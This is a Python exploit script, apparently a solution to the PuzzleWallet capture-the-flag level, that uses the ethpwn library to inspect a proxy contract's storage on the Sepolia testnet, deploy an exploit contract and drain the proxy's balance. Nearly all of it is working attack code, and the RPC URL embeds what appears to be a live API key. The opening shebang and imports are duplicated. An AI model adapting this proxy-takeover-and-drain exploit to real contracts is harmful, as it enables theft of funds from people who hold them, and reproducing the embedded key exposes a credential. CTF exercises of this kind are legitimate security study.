#!/usr/bin/env python3

import sys
from ethpwn import *

#!/usr/bin/env python3

from web3 import Web3
from time import sleep

from ethpwn import context
from ethpwn.contract_metadata import CONTRACT_METADATA
from ethpwn.transactions import transact

MY_WALLET = get_wallet_by_name('Laptop CTF Metamask')
assert MY_WALLET is not None

context.log_level = 'DEBUG'

context.connect_http('https://eth-sepolia.g.alchemy.com/v2/CIlvNRJd1iqhTV5d_KIBxWX_qCq0j71v')
context.default_from_addr = MY_WALLET.address
context.default_signing_key = MY_WALLET.private_key

PROXY_ADDR = sys.argv[1]
KILL_AMOUNT = context.w3.eth.get_balance(PROXY_ADDR)

print("KILL_AMOUNT: {} [{} ether]".format(KILL_AMOUNT, context.w3.from_wei(KILL_AMOUNT, 'ether')))

CONTRACT_METADATA.add_contracts_from_solidity_files(['./exploit_puzzle_wallet.sol'])

proxy_contract = CONTRACT_METADATA['PuzzleProxy'].get_contract_at(PROXY_ADDR)

owner_pendingAdmin_prev = context.w3.eth.get_storage_at(proxy_contract.address, 0)
maxBalance_admin_prev = context.w3.eth.get_storage_at(proxy_contract.address, 1)
proxy_impl_addr = context.w3.eth.get_storage_at(proxy_contract.address, 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc)

print("owner_pendingAdmin_prev: {}".format(owner_pendingAdmin_prev.hex()))
print("maxBalance_admin_prev: {}".format(maxBalance_admin_prev.hex()))
print("proxy_impl_addr: {}".format(proxy_impl_addr.hex()))

with CONTRACT_METADATA['ExpPuzzleWallet'].deploy_destructible(
        PROXY_ADDR, KILL_AMOUNT
    ) as (tx_hash, target):

    # tx_hash, tx_receipt = transact(target.functions.exploit(), force=True)
    # print(f"Received exploit receipt (block_number={tx_receipt['blockNumber']})")

    print(f"Exploit contract is at {target.address}")
    print(f"Target contract is at {PROXY_ADDR}")

    sleep(2)
    tx_hash, tx_receipt = transact(target.functions.exploit(), force=True, value=KILL_AMOUNT)
    print(f"Received exploit receipt (block_number={tx_receipt['blockNumber']})")


owner_pendingAdmin_post = context.w3.eth.get_storage_at(proxy_contract.address, 0)
maxBalance_admin_post = context.w3.eth.get_storage_at(proxy_contract.address, 1)

print("owner_pendingAdmin_post: {}".format(owner_pendingAdmin_post.hex()))
print("maxBalance_admin_post: {}".format(maxBalance_admin_post.hex()))